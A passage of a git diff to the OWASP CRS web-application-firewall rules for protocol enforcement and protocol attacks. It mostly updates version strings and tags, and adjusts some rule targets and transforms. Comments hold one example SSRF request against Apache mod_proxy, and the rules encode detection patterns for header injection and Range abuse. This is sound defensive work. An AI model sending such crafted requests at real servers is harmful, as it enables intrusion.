+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1104,9 +1056,10 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.extension=.%{tx.1}/',\
     chain"
@@ -1131,9 +1084,10 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1185,9 +1139,10 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\
     chain"
@@ -1219,9 +1174,10 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 100" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1253,7 +1209,8 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1275,8 +1232,9 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \
@@ -1300,7 +1258,8 @@ SecRule REQUEST_URI_RAW "@contains #" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1332,13 +1291,14 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -1376,8 +1336,9 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_BASENAME "!@endsWith .pdf" \
@@ -1400,8 +1361,9 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \
@@ -1421,8 +1383,9 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153/267/120',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
 
@@ -1430,7 +1393,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \
 #
 # PL2: This is a stricter sibling of 920270.
 #
-SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \
+SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \
     "id:920271,\
     phase:2,\
     block,\
@@ -1443,8 +1406,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
@@ -1469,9 +1433,10 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'"
 
@@ -1492,8 +1457,9 @@ SecRule FILES_NAMES|FILES "@rx ['\";=\x5c]" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
@@ -1517,8 +1483,9 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
@@ -1543,9 +1510,10 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\
     chain"
@@ -1571,8 +1539,9 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_BODY "@rx \x25" \
@@ -1580,8 +1549,8 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded
         SecRule REQUEST_BODY "@validateUrlEncoding" \
             "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -1592,7 +1561,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'O
 # This rule is also triggered by the following exploit(s):
 # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
 #
-SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \
+SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \
     "id:920272,\
     phase:2,\
     block,\
@@ -1605,8 +1574,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
@@ -1638,9 +1608,10 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \
@@ -1672,8 +1643,9 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
@@ -1725,8 +1697,9 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \
     tag:'header-allowlist',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \
@@ -1755,14 +1728,15 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -1784,8 +1758,9 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \
@@ -1811,8 +1786,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 
@@ -1832,8 +1808,9 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 
@@ -1858,8 +1835,9 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 
@@ -1902,8 +1880,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/153/267',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
index baeaaf906..fbb5cadf1 100644
--- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf
+++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -45,8 +45,9 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -77,8 +78,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -98,8 +100,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -123,7 +126,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
     phase:1,\
     block,\
     capture,\
-    t:none,t:htmlEntityDecode,\
+    t:none,t:urlDecodeUni,\
     msg:'HTTP Header Injection Attack via headers',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -132,8 +135,9 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/273',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -151,7 +155,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
     phase:2,\
     block,\
     capture,\
-    t:none,t:htmlEntityDecode,\
+    t:none,\
     msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -160,8 +164,9 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -172,7 +177,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
     phase:1,\
     block,\
     capture,\
-    t:none,t:htmlEntityDecode,t:lowercase,\
+    t:none,t:lowercase,\
     msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -181,8 +186,9 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -207,8 +213,9 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -240,8 +247,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'platform-multi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/152/248/136',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -272,9 +280,10 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -285,7 +294,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati
 # This issue affects Apache HTTP Server 2.4.48 and earlier.
 # GET /?unix:AAAAAAAAAAAAA|http://coreruleset.org/
 #
-SecRule REQUEST_URI "@rx unix:[^|]*\|" \
+SecRule REQUEST_URI_RAW "@rx unix:[^|]*\|" \
     "id:921240,\
     phase:1,\
     block,\
@@ -299,14 +308,43 @@ SecRule REQUEST_URI "@rx unix:[^|]*\|" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+# Detection for old V1 cookie format from RFC 2109.
+#
+# This has been abused by the cookie sandwich technique, in diverse issues affecting Apache Tomcat, Python, and maybe others.
+# RFC 6265 deprecated and replaced RFCs 2109 and 2965.
+# It completely removed "$Version", meaning user agents and servers no longer use this attribute.
+# See:
+# - https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique
+# - https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v2.x%29#seccookieformat
